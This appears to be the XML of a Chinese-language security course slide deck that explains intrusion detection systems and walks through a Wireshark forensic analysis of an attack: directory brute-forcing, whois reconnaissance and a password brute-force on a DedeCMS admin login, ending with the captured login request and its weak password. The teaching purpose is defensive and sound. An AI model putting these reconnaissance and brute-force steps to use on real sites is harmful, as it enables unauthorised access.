            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5333" spc="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204120031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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335191" y="1588927"/>
            <a:ext cx="11346735" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（英语：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Intrusion-detection system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，缩写为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）是一种网络安全设备或应用软件，可以监控网络传输或者系统，检查是否有可疑活动或者违反企业的政策。侦测到时发出警报或者采取主动反应措施。它与其他网络安全设备的不同之处便在于，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一种积极主动的安全防护技术。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>入侵检测系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(IDS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>能够监视网络上的流量，通过系统搜索可疑的活动和已知的威胁，并在发现此类项目时发出威胁预警。用稍微技术一点话来说，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的总体目标是及时通知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>管理人员，系统中可能正在发生的异常行为。威胁预警中通常会包含有关入侵源地址、目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>受害者地址以及可疑攻击类型等信息。企业</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>部门可以通过部署入侵检测系统，来了解其技术环境中存在的潜在恶意活动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>入侵检测系统可以分为两大类：基于主机的入侵检测系统，以及基于网络的入侵检测系统。区分这两种类别的关键在于入侵检测软件的传感器放置在何处（主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端点或网络）。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243244081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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1650808" y="1173326"/>
            <a:ext cx="11346735" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>工作原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息收集：日志，文件，行为，物理形式（外来人员）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B33C24C-856F-4223-B882-6C82E097D441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325860" y="3174052"/>
            <a:ext cx="11346735" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>流量分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://zhuanlan.zhihu.com/p/36536961</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>排除内网地址，我们可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ip202.99.27.194</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>疯狂对网站发起请求，于是基本可以确定此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为攻击者。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>于是我们去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中过滤出相应的攻击流，使用过滤命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> == 202.99.27.194 &amp;&amp; http</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEB1693-045A-4B69-AF79-0B2D8E63E559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="840160" y="1958156"/>
            <a:ext cx="10145158" cy="3170098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1956553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CCBC93E-E515-48B9-8B0B-19075C387F4D}"/>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流量分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B33C24C-856F-4223-B882-6C82E097D441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2203668"/>
            <a:ext cx="11346735" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>同样可以发现目的地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>172.16.60.199</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，为受害服务器的地址。同时看到黑客大量访问网页目录，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>asp,jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>什么都在访问，不难看出黑客在进行目录爆破。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D8D034C-CC26-43A2-8DCB-DBCB277B18FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="947000" y="3438904"/>
            <a:ext cx="10298000" cy="2845331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4051896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5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911426" y="1982901"/>
            <a:ext cx="4649620" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果知道目标的域名，你首先要做的就是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据库查询域名的注册信息，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据库是提供域名的注册人信息，包括联系方式，管理员名字，管理员邮箱等等，其中也包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器的信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用命令行工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以直接查询目标域名相关信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F9455C1-3FE2-4D9F-80DF-9D797F301F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="157485"/>
            <a:ext cx="6108700" cy="7436485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16F792CA-2EA8-41B9-90D3-02DBD9467425}"/>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注册人资料</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7981605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BCCBC93E-E515-48B9-8B0B-19075C387F4D}"/>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流量分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B33C24C-856F-4223-B882-6C82E097D441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2203668"/>
            <a:ext cx="11346735" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上图可以看出黑客成功找到了后台管理的地址，选取一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据包查看其请求与相应内容如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C118671-1CA9-40D2-9EA7-58B80DE8DA46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3423557" y="2794465"/>
            <a:ext cx="5981700" cy="3906050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330039129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251520" y="2203668"/>
            <a:ext cx="11346735" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可见黑客在对管理员账号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行密码爆破。将针对管理后台地址的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求进行时间排序，获取最后一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求的报文内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gotopage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dopost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login&amp;adminstyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>newdedecms&amp;userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin&amp;pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=admin123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>该报文相应的响应报文中有内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
